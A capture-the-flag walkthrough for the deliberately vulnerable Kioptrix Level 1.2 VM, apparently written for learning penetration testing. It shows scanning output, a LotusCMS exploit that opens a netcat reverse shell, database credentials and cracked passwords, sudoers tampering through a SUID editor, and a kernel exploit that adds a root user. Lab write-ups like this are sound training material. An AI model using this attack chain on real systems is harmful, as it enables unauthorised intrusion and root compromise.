Kioptrix: Level 1.2 (#3) CTF VM WalkThrough

VM :  Kioptrix: Level 1.2 (#3)

Download Link :

VM HOST : VMware Workstation/Player
Network : Briged mode with DHCP

Nmap Scan :
 $ nmap -A -oN nmap.scan
 # Nmap 7.80 scan initiated Sun Apr 19 14:08:17 2020 as: nmap -A -oN nmap.scan
 Nmap scan report for
 Host is up (0.00050s latency).
 Not shown: 998 closed ports
 22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
 | ssh-hostkey:
 |   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
 |_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
 80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
 | http-cookie-flags:
 |   /:
 |_      httponly flag not set
 |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 |_http-title: Ligoat Security - Got Goat? Security ...
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.8 - 2.6.30
 Network Distance: 2 hops
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 TRACEROUTE (using port 21/tcp)
 1   0.04 ms
 2   0.41 ms
 OS and Service detection performed. Please report any incorrect results at .
 # Nmap done at Sun Apr 19 14:08:27 2020 -- 1 IP address (1 host up) scanned in 9.80 seconds
Findings :
* The apache web server is running on port 80.
* SSH is running on port 22.

Checking the web app
 $ python

Link :

Also note that the web app is using LotasCMS.

There is also a gallery app, but to access all its content map the IP address of VM to kioptrix3.con by adding it to /etc/hosts file
 $ sudo echo '' >> /etc/hosts
URL of gallery app is :

Scanning Web Application : 
nikto scan output
 $ nikto -host
 - Nikto v2.1.5
 + Target IP:
 + Target Hostname:
 + Target Port:        80
 + Start Time:         2020-04-20 18:46:19 (GMT5.5)
 + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
 + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
 + The anti-clickjacking X-Frame-Options header is not present.
 + Cookie PHPSESSID created without the httponly flag
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: 0x46b9ece7ac600
 + Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
 + DEBUG HTTP verb may show server debugging information. See for details.
 + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
 + OSVDB-3268: /icons/: Directory indexing found.
 + Cookie phpMyAdmin created without the httponly flag
 + OSVDB-3233: /icons/README: Apache default file found.
 + /phpmyadmin/: phpMyAdmin directory found
 + 6544 items checked: 0 error(s) and 14 item(s) reported on remote host
 + End Time:           2020-04-20 18:46:28 (GMT5.5) (9 seconds)
 + 1 host(s) tested
phpmyadmin directory is found.

Similarly results from dirb
 $ dirb | tee dirb.scan
 + (CODE:200|SIZE:23126)                                                                                                                                                         + (CODE:200|SIZE:1819)                                                                                                                                                            + (CODE:200|SIZE:1819)                                                
 ==> DIRECTORY:                                                      
 + (CODE:200|SIZE:0)                                                                                                                                                          + (CODE:500|SIZE:5650)                                                                                                                                                    + (CODE:200|SIZE:18902)                                                                                                                                              + (CODE:200|SIZE:8136)                                             
 + (CODE:200|SIZE:0)                                                                                                                                                  + (CODE:200|SIZE:356)                                                                                                                                                       + (CODE:200|SIZE:0)                                                                                                                                                         + (CODE:200|SIZE:0)                                                                                                                                               + (CODE:200|SIZE:0)                                                                                                                                                      + (CODE:200|SIZE:0)                                                  
 + (CODE:200|SIZE:0)                                                                                                                                                     + (CODE:200|SIZE:23126)
 + (CODE:200|SIZE:1819)
 + (CODE:200|SIZE:1819)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:18902)
 + (CODE:200|SIZE:8136)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:356)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:0)
 + (CODE:200|SIZE:0)
and also scan results from dirsearch :
 $ ./ -u -e php,asp,aspx,jsp,html,zip,jar,sql --plain-text-report=dirsearchReport
 $ cat dirsearchReport | grep 200
 200     2KB
 200   688B
 200    23KB
 200     2KB
 200     2KB
 200   146B
 200     8KB
We can access myphpadmin with deafult user `admin` and blank password field, but there is only information_schema is accessible with default credentials.

Exploiting Lotas CMS :

A quick search of lotasCMS vulnerability will shows that version 3.0 is vulnerable to RCE

Link :

To exploit this start a listener on attack machine
 $ wget
 $ chmod +x
 $ ./ /
 Path found, now to check for vuln....
 Regex found, site is vulnerable to PHP Code Injection!
 About to try and inject reverse shell....
 what IP to use?      <----- IP address of local machine
 What PORT?
 1234             <---- listener port number
 OK, open your local listener and choose the method for back connect:
 1) NetCat -exploit    3) NetCat Backpipe5) Exit
 2) NetCat /dev/tcp  4) NetCat FIFO
 #? 1
and we get the reverse connection
 Listening on [] (family 0, port 1234)
 Connection from 37530 received!
getting tty shell
 python -c 'import pty;pty.spawn("/bin/sh")'

Enumerating files :
Looking at web directory :
 $ pwd
 $ ls
 cache  data    gallery  index.php  style
 core   favicon.ico  gnu-lgpl.txt  modules    update.php
 $ cd gallery
 $ ls
 BACK     gfooter.php     logout.php        readme.html    tags.php
 db.sql     gfunctions.php  p.php       recent.php     themes
 g.php     gheader.php     photos       register.php   version.txt
 gadmin     index.php     photos.php        scopbin      vote.php
 gallery.php  install.BAK     post_comment.php  search.php
 gconfig.php  login.php     profile.php       slideshow.php
 $ cat gconfig.php
         A sample Gallarific configuration file. You should edit
         the installer details below and save this file as gconfig.php
         Do not modify anything else if you don't know what it is.
     // Installer Details -----------------------------------------------
     // Enter the full HTTP path to your Gallarific folder below,
     // such as
     // Do NOT include a trailing forward slash
     $GLOBALS["gallarific_path"] = "";
     $GLOBALS["gallarific_mysql_server"] = "localhost";
     $GLOBALS["gallarific_mysql_database"] = "gallery";
     $GLOBALS["gallarific_mysql_username"] = "root";
     $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
In webdirectory of gallery we find database creds "root/fukeyou", and we can successfully logged-in on myphpadmin, and on gallery database we found two usernames with hashed passwords :
 dreg         fb887aabd50f243b3f155c0f85
 loneferret   5badcaf789d3d1d09794d8f021f40f0e
Although these passwords are cracked with
 dreg        :  Mast3r
 loneferret  :  starwars
With user "loneferret/starwars" we can successfully ssh into the machine
 $ ssh loneferret@
 loneferret@'s password:
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 The programs included with the Ubuntu system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
 applicable law.
 To access official Ubuntu documentation, please visit:
 Last login: Mon Apr 20 04:26:57 2020 from
 loneferret@Kioptrix3:~$ whoami
But with this we can't access the root directory
 loneferret@Kioptrix3:~$ cd /root
 -bash: cd: /root: Permission denied

Privilege Escalation :

Method 1 :
There is a file CompanyPolicy.README, which descirbe command 'sudo ht'
 loneferret@Kioptrix3:~$ cat CompanyPolicy.README
 Hello new employee,
 It is company policy here to use our newly installed software for editing, creating and viewing files.
 Please use the command 'sudo ht'.
 Failure to do so will result in you immediate termination.
 loneferret@Kioptrix3:~$ sudo ht
 sudo: no passwd entry for root!
 loneferret@Kioptrix3:~$ which ht
 loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
 -rwsr-sr-x 1 firefart root 2072344 2011-04-16 07:26 /usr/local/bin/ht
`ht` is a file editor/viewer/analyzer for executables. And in this case it is setted to suid, means it runs with root privilege, and we can edit files which require to root access with it. Means we can escalate our privilege by editing `etc/sudoers` file and allow use `loneferret` to `/bin/su` file, which gives us root access.

Open th file By
 $ sudo ht /etc/sudoers
Which looks like this

To change it into text mode press `F6` and coose text mode

We have to change '!/usr/bin/su' to '/bin/su'

To edit file change the mode into "hex" (press F6) and press F4 to edit, now just place "20" (hex for space) into the place of "!/usr" in "!/usr/bin/su", which looks like

Before :

After :

and press F2 to save.

Now just run the command `sudo su`
 loneferret@Kioptrix3:~$ sudo su
 root@Kioptrix3:/home/loneferret# whoami
Thats it, we get the root shell!!
 Congrats.txt  ht-2.0.18
 root@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
 you got here, congratulations are in order. Wasn't that bad now was it.
 Went in a different direction with this VM. Exploit based challenges are
 nice. Helps workout that information gathering part, but sometimes we
 need to get our hands dirty in other things as well.
 Again, these VMs are beginner and not intented for everyone.
 Difficulty is relative, keep that in mind.
 The object is to learn, do some research and have a little (legal)
 fun in the process.
 I hope you enjoyed this third challenge.
 Steven McElrea
 aka loneferret
 Credit needs to be given to the creators of the gallery webapp and CMS used
 for the building of the Kioptrix VM3 site.
 Main page CMS:
 Gallery application:
 Gallarific 2.1 - Free Version released October 10, 2009
 Vulnerable version of this application can be downloaded
 from the Exploit-DB website:
 The HT Editor can be found here:
 And the vulnerable version on Exploit-DB here:
 Also, all pictures were taken from Google Images, so being part of the
 public domain I used them.

Method 2 :

We are using this method within the reverse shell obtained by LotusCMS exploit.

First check the version of OS and Kernel
 $ cat /etc/issue
 Ubuntu 8.04.3 LTS \n \l
 $ cat /etc/*-release
 $ uname -a
 Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
 $ cat /proc/version
 Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
So the kernel version is 2.6.24, now for searching exploit for Linux kernel 2.6.24 i found following exploit  :

According to the documentation the exploit creates a new user 'firefart' with root privilege, download it and test it.
 $ cd /tmp
 $ wget wget
 $ gcc -pthread exploit.c -o exploit -lcrypt
 exploit.c:193:2: warning: no newline at end of file
 $ ./exploit
 /etc/passwd successfully backed up to /tmp/passwd.bak
 Please enter the new password: 12345
 Complete line:
 mmap: b7fe0000
 madvise 0
 ptrace 0
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
 Done! Check /etc/passwd to see if the new user was created.
 You can log in with the username 'firefart' and the password '12345'.
 DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Exploits seems to works, now try to login with new user "firefart" with password 12345
 $ su firefart
 Password: 12345
 firefart@Kioptrix3:/tmp# cd /root
 firefart@Kioptrix3:~# ls
 Congrats.txt  ht-2.0.18
 firefart@Kioptrix3:~# cat Congrats.txt
 Good for you for getting here.
 Regardless of the matter (staying within the spirit of the game of course)
We can access the /root directory.